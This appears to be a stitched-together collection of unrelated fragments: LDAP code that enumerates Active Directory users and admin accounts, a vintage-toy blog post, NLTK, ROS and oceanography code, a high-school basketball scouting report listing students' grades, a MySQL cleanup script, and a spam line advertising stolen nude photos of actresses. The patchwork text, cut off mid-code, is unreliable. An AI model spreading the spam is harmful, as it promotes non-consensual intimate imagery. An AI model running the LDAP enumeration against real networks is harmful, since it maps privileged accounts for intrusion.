except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
return False
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
status = 'enabled'
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
if int(attribute['vals'][0]) & 2 :
status = 'disabled'
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight("User: " + value[0] + " Status: " + value[5])
else:
self.logger.error("No entries found!")
return
def admin_count(self):
# Building the search filter
searchFilter = "(adminCount=1)"
attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
|
Here's a lovely little gem from 1978, the Mego "2-XL" 8 Track tape player, which looks like a delightfully awesome robot. I really wish that I had been old enough to get into this branch of consumer electronics, especially when they looked like this and were made by the legendary Mego folks. I was 2, just about, when this was on the market, so I guess that was a little early to pick up some Judas Priest on the 8 track deck. Ah well, I could always make up for lost time and add this little pal to the collection, or you could instead!
|
"""
Extension of temporaldrt using WordNet ontology
"""
__author__ = " Emma Li, Peter Makarov, Alex Kislev"
__version__ = "1.0"
__date__ = "Tue, 24 Aug 2010"
import nltk
from nltk.corpus.reader.wordnet import WordNetCorpusReader
import temporaldrt as drt
from temporaldrt import DrtTokens, DrtFeatureConstantExpression
def singleton(cls):
instance_container = []
def getinstance():
if not len(instance_container):
instance_container.append(cls())
return instance_container[0]
return getinstance
@singleton
class WordNetLookup(object):
def __init__(self, path='corpora/wordnet'):
self.path = path
self.WN = None
def wn(self):
if not self.WN:
self.WN = WordNetCorpusReader(nltk.data.find(self.path))
def is_superclass_of(self, first, second):
"Is the second noun the superclass of the first one?"
self.wn()
try:
num_of_senses_first = self._num_of_senses(first)
num_of_senses_second = self._num_of_senses(second)
except: return False
for n in range(num_of_senses_second):
synset_second = self._noun_synset(second, ind=n)
for i in range(num_of_senses_first):
if synset_second in self._noun_synset(first, i).common_hypernyms(synset_second):
return True
return False
def is_adjective(self, word):
try:
self._num_of_senses(word, 'a')
return True
except: return False
def _noun_synset(self, noun, ind):
self.wn()
return self.WN.synset("%s.n.%s" % (noun, ind))
def _num_of_senses (self, word, pos='n'):
self.wn()
return len(self.WN._lemma_pos_offset_map[word][pos])
def is_person(self, word):
return self.is_superclass_of(word, 'person')
def is_animal(self, word):
return self.is_superclass_of(word, 'animal')
class DefiniteDescriptionDRS(drt.DefiniteDescriptionDRS):
def __init__(self, refs, conds):
self.wn = WordNetLookup()
super(drt.DefiniteDescriptionDRS, self).__init__(refs, conds)
def _strict_check (self, presupp_noun, other_cond):
other_noun = other_cond.function.variable.name
return (
presupp_noun == other_noun or
self.wn.is_superclass_of(other_noun, presupp_noun) or
(other_cond.is_propername() and (self.wn.is_person(presupp_noun) or self.wn.is_animal(presupp_noun)))
)
def _non_strict_check(self, presupp_noun, other_cond):
strict_check = self._strict_check(presupp_noun, other_cond)
if strict_check: return True
# If the strict check fails, check if both are people
other_noun = other_cond.function.variable.name
return (
(self.wn.is_person(presupp_noun) and self.wn.is_person(other_noun))
or self.wn.is_superclass_of(presupp_noun, other_noun)) # cat, kitty
def semantic_check(self, individuals, presupp_individuals, strict=False):
check = {True : self._strict_check,
False: self._non_strict_check}[strict]
# Strict check - passes if features match and 1) string matching 2) hyponym-hypernym relation, and
# 3) self.funcname is a person or animal and the antecedent is a proper name
# Non-strict check: both are people and features match
if isinstance(self.cond, DrtFeatureConstantExpression):
for individual in individuals:
if isinstance(individual, DrtFeatureConstantExpression) and check(self.function_name, individual):
return True
return False
else:
# If no features are used, we cannot guarantee that the condition we got self.function_name from wasn't an adjective.
# Likewise, individuals contains not only nouns but also adjectives, and we don't know which are which
found_noun = False # We should find at least one noun
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if not self.wn.is_adjective(presupp_noun):
found_noun = True
break
# If we found no noun (that is not also an adjective), ignore the 'is adjective' check for presupposition individuals
# (in that case, we had probably better ignore this check for 'individuals', too)
for individual in individuals:
other_noun = individual.function.variable.name
if found_noun and self.wn.is_adjective(other_noun): continue
for presupp_individual in presupp_individuals[self.variable]:
presupp_noun = presupp_individual.function.variable.name
if found_noun and self.wn.is_adjective(presupp_noun): continue
if check (presupp_noun, individual):
return True
return False
class DrtParser(drt.DrtParser):
def handle_PresuppositionDRS(self, tok, context):
if tok == DrtTokens.DEFINITE_DESCRIPTION_DRS:
self.assertNextToken(DrtTokens.OPEN)
drs = self.handle_DRS(tok, context)
return DefiniteDescriptionDRS(drs.refs, drs.conds)
else:
return drt.DrtParser.handle_PresuppositionDRS(self, tok, context)
|
This report includes notes from November 20-26. Included in this will be the Inaugural River City Challenge from Warren Central HS, Leake County Shootout from Leake County HS and the 8th Annual MS Hoops Challenge Thanksgiving Showcase from Forest Hill HS.
Tommy Washington 6-3 170 lbs F Yazoo City HS (Yazoo City): 18 pts (15 in 2nd half) vs Brandon. He played hard and it showed in his production. He made the best of his scoring opportunities. Post grads might want to take a look at him.
Walter White 6-7 C Brandon HS (Brandon): 2 pts, 7 reb, 3 blk vs Yazoo City. He has the look of a player. Long, strong and athletic. He rebounds and protects the rim. He will be a good fit for a post grad program needing length and size.
Kevin Taylor 6-5 F Brandon HS (Brandon): 14 pts, 10 reb, 5 ast, 3 st vs Yazoo City. A great stat line and he did it very quietly. He is lanky and athletic. He needs to be checked out by post grads and JUCO’s this season.
Dewayne Stewart Jr 6-6 190 lbs G Riverside HS (Grace) (Mississippi State) 3.0 GPA 18 ACT: 19 pts, 7-10 fg, 2 3’s, 10 reb, 3 ast vs Wingfield. DJ, why you do that man like that? DJ had several high flying dunks on his way to his 19 points. The best play of the day might’ve been a missed dunk by DJ. The look on the defenders face when DJ went up on him was priceless. He is a must see player this year for any basketball fan.
Chavis Smith 5-10 159 lbs G Warren Central HS (Vicksburg) 3.0 GPA: 18 pts, 5 reb vs Pearl. Great defending guard. He plays with full effort. He can create contact around the basket and score after the contact. Post grads need to check him out this year.
Chris Early C Warren Central HS (Vicksburg): 11 pts vs Pearl. A good size presence down low on the defensive end. He’s strong and contested shots all night. He scores when he has the opportunity on the offensive end. Another good player for post grads to check out.
Brandon Payne 6-0 165 lbs G Newton HS (Newton) 3.0 GPA: 25 pts, 5 3’s, 2-2 ft, 3 reb, 2 st, 1 charge taken vs Morton. Good shooter from outside and all-around scorer. He showed high energy on both ends. He needs to be seen this season by JUCO Coaches.
Austin Sigsworth 6-4 180 lbs G/F Bay Springs HS (Bay Springs): 10 pts, 3 reb, 1 charge taken vs Forest. Here’s an update from the Magnolia Hoops Senior Showcase. Austin did not play that well as reported from the Showcase. Update, he can play. He showed he can play multiple positions. He has some handles, he rebounded and he showed he can score. He’s a shooter and he can also get into the lane and score on pull up jumpers. He can definitely play on the next level and needs to be checked out by JUCO’s.
Michael Barber 6-8 220 lbs G/F Jackson Academy HS (Jackson) 3.03 GPA 20 ACT: 19 pts, 12 reb, 2 st, 5 blk vs Laurel. That was the best performance I’ve seen from him in several years. He lived up to the Dandy Dozen potential on both ends of the court. He scored 19 (I think they were off because I had him with 20 at the half myself). He handled the ball very well. He rebounded hard on both ends and played defense with some energy. He contested shots and created havoc down low. He displayed skills of a D1 guy today.
Bryson Mills 6-4 G Mendenhall HS (Mendenhall): 15 pts, 12 reb, 2 3’s vs Lanier. Bryson is back from his injury. He has his hops back and his lateral movement. He crashed the boards hard on the offensive end. He should be a high priority for every JUCO around.
Miles Miller 6-3 160 lbs PG Meridian HS (Meridian) 3.9 GPA 28 ACT: 25 pts, 6 3’s, 7-8 ft vs Callaway. D1’s, what in the world are you waiting on? Coach Norman should get tired of schools calling to check on him. High, high academic player. He can shoot. He can handle and distribute. He plays some sneaky good defense. He is equally as smart on the court as he is in the classroom. Big time players show up in big time games and it didn’t get much bigger than that one.
Tyron “Ty” Brewer 6-7 185 lbs F Meridian HS (Brookville) 3.3 GPA 17 ACT: 20 pts, 4-5 ft, 9 reb vs Callaway. Ty had a good game on both ends of the court. He scored and snagged offensive boards. He was everywhere defensively. The low to mid major is set to have a good season.
Damian “Diggy” Dear 6-2 180 lbs PG Murrah HS (Jackson): 18 pts, 3-4 ft vs Raymond. Diggy had a good game scoring on multiple levels. He handled the ball with confidence. He played hard on-ball defense. He is a steal for JUCO’s.
Ladarius Anderson 6-2 G Provine HS (Jackson): 19 pts, 3 3’s, 2-2 ft, 5 ast vs Terry. He scored easily Saturday and shot the ball good. He was really impressive in the loss. He played top notch defense and worked the guy he was guarding hard. JUCO Coaches need to check him out this season.
JaQuondre “Dre” Bethany 6-0 160 lbs G Provine HS (Jackson) 2.7 GPA 16 ACT: 15 pts (10 in 2nd half), 9-10 ft vs Terry. Explosive. He created opportunities for his guys. He got into the lane and dished for shots or got to the free-throw line. He hit this free-throws at a high percentage. He played fast on defense. A great JUCO option and he keeps improving.
Anthony Ratliff Jr 6-3 G/F Jim Hill HS (Jackson): 12 pts, 7 reb, 2 blk vs Northwest Rankin. He didn’t play so well in the first half but played a big role in the second. All of his points, rebounds and blocks come in the second half and OT. A long lanky wing with that is a great athlete.
Kolby Moore 6-4 165 lbs G/F Clinton HS (Clinton): 16 pts, 2 3’s vs Vicksburg. He showed that he can score from outside and mid range with some jumpers.
Xyshan Jenkins G/F Clinton HS (Clinton): 8 pts, 4 reb, 2 blk, 1 st vs Vicksburg. Great looking prospect. He showed he can defend and contest shots. He can rebound and get the ball up the court if he needs to. Keep an eye on him to develop.
Kevin Grimes 6-3 155 lbs G Bay Springs HS (Bay Springs) 3.5 GPA: 20 pts, 6 reb, 1 blk, 1 st vs Forest. The long and lanky guard has added several inches since last season. He is elusive and athletic. He can put up some points in a hurry and is hard to guard. He rebounds hard.
Damien Wheaton 6-7 200 lbs F/C Bay Springs HS (Bay Springs) 3.4 GPA: 2 pts, 10 reb, 2 ast vs Forest. Good size, athletic and long post. He is a defensive specialist. He contested shots at a high level and rebounded with ease.
Diwun Black 6-4 215 lbs G/F Forest HS (Forest): 13 pts, 5-7 ft, 5 reb, 1 blk vs Bay Springs. He plays with high energy. He is long and strong with adequate handles. The MS State football commit can clear the board and get up the court in a hurry. He scores easily after contact.
JaMarie Weathers 6-3 145 lbs G Leake County HS (Walnut Grove) 3.2 GPA: 12 pts, 5 reb, 4 blk, 4 st, 2 ast vs Leake Central. He has an elusive burst of speed of is great at getting into and attacking a zone. He can create opportunities. He played all out of defense. He was blocking shots and getting steals. He continues to improve at a good level.
Jamarious Williams 5-7 G Leake County HS (Walnut Grove): 12 pts, 3 3’s vs Leake Central. He is a great scoring option for Coach Bloodsaw. He shot the ball really well.
Earl Smith 6-4 155 lbs PG Lanier HS (Jackson): 21 pts, 7-9 ft, 9 reb vs Mendenhall. The lefty can stroke it with the best of them. His shot is so nice looking that you will be surprised when he misses. He can create his own shot anytime he wants to. He handles the ball smoothly. He rebounded at a high rate for a guard also on Saturday.
Vontrel Pringle 6-6 185 lbs F Meridian HS (Meridian): 10 pts, 2 3’s vs Callaway. He stepped out and showed his range by knocking down a couple 3’s.
Traemond Pittman 6-2 185 lbs PG Meridian HS (Meridian): 6 pts vs Callaway. A true point that can score. He ran the point and did what his team needed. A great prospect that Meridian has in the making.
Cam Drake 6-5 F Murrah HS (Jackson): 6 pts vs Raymond. He played a great game. He played with high energy on defense and rebounded hard. He’s one I’d like to see play again.
Jakorie Smith 6-5 200 lbs F Raymond HS (Utica): 8 pts vs Murrah. Jakorie played hard all night. He was a force around the basket as a rebounder. He scored down low. He made several nice passes from the high post.
Matthew “Matt” Mackey 6-1 170 lbs G Northwest Rankin HS (Flowood) 19 ACT: 21 pts (14 in 4th qtr and OT), 13-17 ft, 5 reb, 2 st, 1 ast vs Jim Hill. He played on cruise control until the fourth quarter and then the ball found its way to his hands. He played as a patient passer and waited for his moments to strike. The free-throw line was his friend. He was clutch when it counted.
Jaque’vias Tarvin 6-3 G Brandon HS (Brandon): 12 pts, 5 reb, 3 st vs Yazoo City. A nice looking young guard. He has great length and athleticism. He’s a good one to keep an eye on in the future.
Damarion Arrington 6-4 160 lbs G/F Wingfield HS (Jackson): 20 pts, 9-11 fg, 2 3’s, 10 reb, 2 st, 1 blk vs Riverside. Long and lanky with high potential. He showed a little outside and mid-range touch. He is really good off the 2nd and 3rd bounce. He plays fast on the defensive end.
Jabari Bowman 6-4 245 lbs F/C Warren Central HS (Vicksburg) 3.4 GPA: 4 pts, 2 reb vs Pearl. Nice up and coming big man. Good size body with soft hands and good footwork.
Antwan Hatten 6-3 185 lbs G Laurel HS (Laurel) 3.6 GPA: 8 pts, 2-2 ft vs Jackson Academy. Strong guard scored with ease in the first quarter. He finishes around the rim and draws contact.
Damon Haynes 6-1 SG Wingfield HS (Jackson): 3 pts vs Riverside. A nice looking prospect for Coach Gatlin.
Omarion Luss 5-11 150 lbs PG Clinton HS (Clinton) 4.0 GPA 19 ACT: 11 pts, 6 reb, 1 st vs Vicksburg. He played some great on ball defense. He was very aggravating to his man. He has very fast hands on defense and knocks a lot of passes down. He is very smart on offense. He used a variety of moves to get open shots. He played with maturity and composure.
Abraham Mckenzine 6-4 F Laurel HS (Laurel): Nice looking future Laurel stud. He has a frame of being like another Crosby or Drummond.
Reggie Clark 5-10 145 lbs G Holmes County Central HS (Tchula): 5 pts vs Madison Central. Coach Patrick is riding with his freshman guard this year and it’s for good reason. He had a rocky day Saturday shooting the ball but he can score in bunches when his shot is falling. He is a smooth play maker and will be a staple in the Jaguars offense for years to come.
Daeshun Ruffin 5-9 160 lbs PG Callaway HS (Jackson): 20 pts, 2 3’s, 2 reb, 5 ast and the game winning And1 vs Meridian. Real deal freshman came thru in the clutch. He can score on all levels. He has good handles and runs the Chargers team nicely. The sky is the limit for the Ruffin with a game winner under his belt now. Sorry about the first video being sideways. It was too good not to share and that was the best I could do with the recording.
Jamaal Esco 5-11 PG Murrah HS (Jackson): 12 pts, 3-4 ft vs Raymond. Here’s a freshman that I didn’t know anything about going into Saturday but he will be added to the list of highly touted ’21’s. He played like an upperclassman and handled himself with composure. He will be a good one to keep an eye on over the next several years.
Bay Springs Bulldogs: A bit of bad news for 2A this year. Bay Springs is deep, talented and good. Coach Mackey might be able to bring another title home this year and with only 2 seniors on the team, may be a couple more titles.
Madison Central Jaguars: Coach Speech has a really good young group coming along. He has size and talent on the way. A couple of the guys contributing this season are David Brown (6-5 ’19 F 3.2 GPA 17 pts), Justin Storm (6-6 ’20 lefty C 12 pts), Holden Grimes (6-5 ’20 G/F 7 pts), Logan Landis (6-5 ’20 C 3 pts), Sam Meadows (6-5 ’19 F 2 pts) and LaKevin Dixon (’21 G). Keep an eye for Madison Central to be special in the next few years with this much size and talent.
Meridian Wildcats: Coach Norman played several young players in the game. Some key young players he has coming up that played big minutes are Makeem Roberts (5-10 ’20 G 3.1 GPA), Azerious Ellis (5-8 ’20 G 3.2 GPA 2 pts) and Ke’Edrick Armstead (6-4 ’20 F 4.0 GPA 5 pts).
Murrah Mustangs: Coach Riley started 2 freshmen and played another quality minutes. The before mentioned Esco, Joseph Dupree (6-5 ’21 F/C 4 pts) and Jaylen Bolden (6-0 ’21 G 5 pts) will be a big part of the future at Murrah.
|
#!/usr/bin/python
# requisito: pip install PyMySQL
import pymysql.cursors
HOST = 'localhost'
USER = 'root'
PASSWORD = ''
DB = ''
SELECT_EXCLUIDOS = "SELECT %s FROM %s WHERE ind_excluido = 1 ORDER BY %s"
REGISTROS_INCONSISTENTES = "DELETE FROM %s WHERE %s "
"in (%s) AND ind_excluido = 0 "
EXCLUI_REGISTRO = "DELETE FROM %s WHERE ind_excluido=1"
NORMA_DEP = "DELETE FROM vinculo_norma_juridica WHERE cod_norma_referente in (%s) OR \
cod_norma_referida in (%s) AND ind_excluido = 0 "
mapa = {} # mapa com tabela principal -> tabelas dependentes
mapa['tipo_autor'] = ['autor']
mapa['materia_legislativa'] = ['acomp_materia', 'autoria', 'despacho_inicial',
'documento_acessorio', 'expediente_materia',
'legislacao_citada', 'materia_assunto',
'numeracao', 'ordem_dia', 'parecer',
'proposicao', 'registro_votacao',
'relatoria', 'tramitacao']
mapa['norma_juridica'] = ['vinculo_norma_juridica']
mapa['comissao'] = ['composicao_comissao']
mapa['sessao_legislativa'] = ['composicao_mesa']
mapa['tipo_expediente'] = ['expediente_sessao_plenaria']
"""
mapa['autor'] = ['tipo_autor', 'partido', 'comissao', 'parlamentar']
mapa['parlamentar'] = ['autor', 'autoria', 'composicao_comissao',
'composicao_mesa', 'dependente', 'filiacao',
'mandato', 'mesa_sessao_plenaria', 'oradores',
'oradores_expediente', 'ordem_dia_presenca',
'registro_votacao_parlamentar', 'relatoria',
'sessao_plenaria_presenca', 'unidade_tramitacao']
"""
def get_ids_excluidos(cursor, query):
"""
recupera as PKs de registros com ind_excluido = 1 da tabela principal
"""
cursor.execute(query)
excluidos = cursor.fetchall()
# flat tuple of tuples with map transformation into string
excluidos = [str(val) for sublist in excluidos for val in sublist]
return excluidos
def remove_tabelas(cursor, tabela_principal, pk, query_dependentes=None):
QUERY = SELECT_EXCLUIDOS % (pk, tabela_principal, pk)
ids_excluidos = get_ids_excluidos(cursor, QUERY)
print("\nRegistros da tabela '%s' com ind_excluido = 1: %s" %
(tabela_principal.upper(), len(ids_excluidos)))
"""
Remove registros de tabelas que dependem da tabela principal,
e que se encontram com ind_excluido = 0 (nao excluidas), se
tais registros existirem.
"""
if ids_excluidos:
print("Dependencias inconsistentes")
for tabela in mapa[tabela_principal]:
QUERY_DEP = REGISTROS_INCONSISTENTES % (
tabela, pk, ','.join(ids_excluidos))
# Trata caso especifico de norma_juridica
if query_dependentes:
QUERY_DEP = query_dependentes % (','.join(ids_excluidos),
','.join(ids_excluidos))
print(tabela.upper(), cursor.execute(QUERY_DEP))
"""
Remove todos os registros com ind_excluido = 1 das tabelas
dependentes e da tabela principal, nesta ordem.
"""
print("\n\nRegistros com ind_excluido = 1")
for tabela in mapa[tabela_principal] + [tabela_principal]:
QUERY = EXCLUI_REGISTRO % tabela
print(tabela.upper(), cursor.execute(QUERY))
def remove_excluidas(cursor):
cursor.execute("SHOW_TABLES")
for row in cursor.fetchall():
print(row)
def remove_proposicao_invalida(cursor):
return cursor.execute(
"DELETE FROM proposicao WHERE cod_mat_ou_doc is null")
def remove_materia_assunto_invalida(cursor):
return cursor.execute(
"DELETE FROM materia_assunto WHERE cod_assunto = 0")
def shotgun_remove(cursor):
for tabela in get_ids_excluidos(cursor, "SHOW TABLES"):
try:
cursor.execute("DELETE FROM %s WHERE ind_excluido = 1" % tabela)
except:
pass
if __name__ == '__main__':
connection = pymysql.connect(host=HOST,
user=USER,
password=PASSWORD,
db=DB)
cursor = connection.cursor()
# TIPO AUTOR
remove_tabelas(cursor, 'tipo_autor', 'tip_autor')
# MATERIA LEGISLATIVA
remove_tabelas(cursor, 'materia_legislativa', 'cod_materia')
# NORMA JURIDICA
remove_tabelas(cursor, 'norma_juridica', 'cod_norma', NORMA_DEP)
# COMISSAO
remove_tabelas(cursor, 'comissao', 'cod_comissao')
# SESSAO LEGISLATIVA
remove_tabelas(cursor, 'sessao_legislativa', 'cod_sessao_leg')
# EXPEDIENTE SESSAO
remove_tabelas(cursor, 'tipo_expediente', 'cod_expediente')
# AUTOR
remove_tabelas(cursor, 'autor', 'cod_autor')
# PARLAMENTAR
remove_tabelas(cursor, 'parlamentar', 'cod_parlamentar')
# PROPOSICAO
remove_proposicao_invalida(cursor)
# MATERIA_ASSUNTO
remove_materia_assunto_invalida(cursor)
# shotgun_remove(cursor)
cursor.close()
|
Tifft Nature Preserve is a 260+ acre nature refuge on the shores of Lake Erie. It was closed when i came through, but peaceful nonetheless.
The obligitory “What you can and can't do” sign. . .
. . . The visitor center across the pond. . .
. . .snow covered rocks. . .
|
# -*- coding: utf-8 -*-
#M3 -- Meka Robotics Robot Components
#Copyright (c) 2010 Meka Robotics
#Author: edsinger@mekabot.com (Aaron Edsinger)
#M3 is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#M3 is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#You should have received a copy of the GNU Lesser General Public License
#along with M3. If not, see <http://www.gnu.org/licenses/>.
#import roslib; roslib.load_manifest('kontrol')
#from kontrol.msg import Kontrol
import time
import rospy
from threading import Thread
from sensor_msgs.msg import Joy
import os
import subprocess
class M3KontrolThread(Thread):
def __init__(self,verbose=True):
Thread.__init__(self)
self.korg = subprocess.Popen(['rosrun', 'korg_nanokontrol', 'kontrol.py','3'])
self.sliders = [0]*9
self.knobs = [0]*9
self.buttons = [0]*18
self.verbose=verbose
def start(self):
if self.verbose:
print 'Starting M3KontrolThread...'
rospy.init_node('korg_nanokontrol',anonymous=True,disable_signals=True) #allow Ctrl-C to master process
rospy.Subscriber("/joy",Joy,self.callback)
Thread.start(self)
def stop(self):
os.system("pkill -P " + str(self.korg.pid))
os.kill(self.korg.pid,9)
rospy.signal_shutdown('Exiting')
def run(self):
rospy.spin()
def callback(self,data):
if self.verbose:
print data
self.sliders = data.axes[:len(self.sliders)]
self.knobs = data.axes[len(self.sliders):len(self.sliders)+len(self.knobs)]
self.buttons = data.buttons
if self.verbose:
print self.sliders
print self.knobs
print self.buttons
class M3Kontrol:
def __init__(self,verbose=False):
self.kontrol_thread = M3KontrolThread(verbose)
self.kontrol_thread.start()
def get_slider(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.sliders):
return self.kontrol_thread.sliders[idx]
else:
return 0
def get_knob(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.knobs):
return self.kontrol_thread.knobs[idx]
else:
return 0
def get_button(self, idx):
if idx >= 0 and idx < len(self.kontrol_thread.buttons):
return self.kontrol_thread.buttons[idx]
else:
return 0
def stop(self):
self.kontrol_thread.stop()
|
Want see the sight new photo naked actresses? means you to address, we every week publish selfie stars and their Leaked, as well as the legs. We you find fotos stolen on the internet. We constantly improve update our content.
|
#!/usr/bin/python2.7
# encoding: utf-8
from __future__ import division
import numpy as np
import numexpr as ne
from pyseidon.utilities.miscellaneous import *
from pyseidon.utilities.BP_tools import *
import time
# Custom error
from pyseidon_error import PyseidonError
class FunctionsStationThreeD:
"""
**'Utils3D' subset of Station class gathers useful functions for 3D runs**
"""
def __init__(self, variable, grid, plot, History, debug):
#Inheritance
self._debug = debug
self._plot = plot
#Create pointer to FVCOM class
setattr(self, '_var', variable)
setattr(self, '_grid', grid)
setattr(self, '_History', History)
def search_index(self, station):
"""Search for the station index"""
if type(station)==int:
index = station
elif type(station).__name__ in ['str', 'ndarray']:
station = "".join(station).strip().upper()
for i in range(self._grid.nele):
if station=="".join(self._grid.name[i]).strip().upper():
index=i
else:
raise PyseidonError("---Wrong station input---")
if not 'index' in locals():
raise PyseidonError("---Wrong station input---")
return index
def depth(self, station, debug=False):
"""
Compute depth at given point
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dep = depth, 2D array (ntime, nlevel)
Notes:
- depth convention: 0 = free surface
- index is used in case one knows already at which
element depth is requested
"""
debug = debug or self._debug
if debug:
print "Computing depth..."
start = time.time()
#Search for the station
index = self.search_index(station)
#Compute depth
h = self._grid.h[index]
el = self._var.el[:,index]
zeta = el + h
siglay = self._grid.siglay[:,index]
dep = zeta[:, np.newaxis]*siglay[np.newaxis, :]
if debug:
end = time.time()
print "Computation time in (s): ", (end - start)
return np.squeeze(dep)
def verti_shear(self, station, t_start=[], t_end=[], time_ind=[],
bot_lvl=[], top_lvl=[], graph=True, debug=False):
"""
Compute vertical shear at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- dveldz = vertical shear (1/s), 2D array (time, nlevel - 1)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- bot_lvl = index of the bottom level to consider, integer
- top_lvl = index of the top level to consider, integer
- graph = plots graph if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing vertical shear at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Compute depth
dep = self.depth(station, debug=debug)
if not argtime==[]:
depth = dep[argtime,:]
else:
depth = dep
#Sigma levels to consider
if top_lvl==[]:
top_lvl = self._grid.nlevel - 1
if bot_lvl==[]:
bot_lvl = 0
sLvl = range(bot_lvl, top_lvl+1)
#Extracting velocity at point
if not argtime==[]:
U = self._var.u[argtime,:,index]
V = self._var.v[argtime,:,index]
else:
U = self._var.u[:,:,index]
V = self._var.v[:,:,index]
norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
# Compute shear
dz = depth[:,sLvl[1:]] - depth[:,sLvl[:-1]]
dvel = norm[:,sLvl[1:]] - norm[:,sLvl[:-1]]
dveldz = dvel / dz
if debug:
print '...Passed'
#Plot mean values
if graph:
mean_depth = np.mean((depth[:,sLvl[1:]]
+ depth[:,sLvl[:-1]]) / 2.0, 0)
mean_dveldz = np.mean(dveldz,0)
error = np.std(dveldz,axis=0)
self._plot.plot_xy(mean_dveldz, mean_depth, xerror=error[:],
title='Shear profile ',
xLabel='Shear (1/s) ', yLabel='Depth (m) ')
return np.squeeze(dveldz)
def velo_norm(self, station, t_start=[], t_end=[], time_ind=[],
graph=True, debug=False):
"""
Compute the velocity norm at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- velo_norm = velocity norm, 2D array (time, level)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- graph = plots vertical profile averaged over time if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing velocity norm at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Computing velocity norm
try:
if not argtime==[]:
U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
W = self._var.w[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
W = self._var.w[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
except AttributeError:
if not argtime==[]:
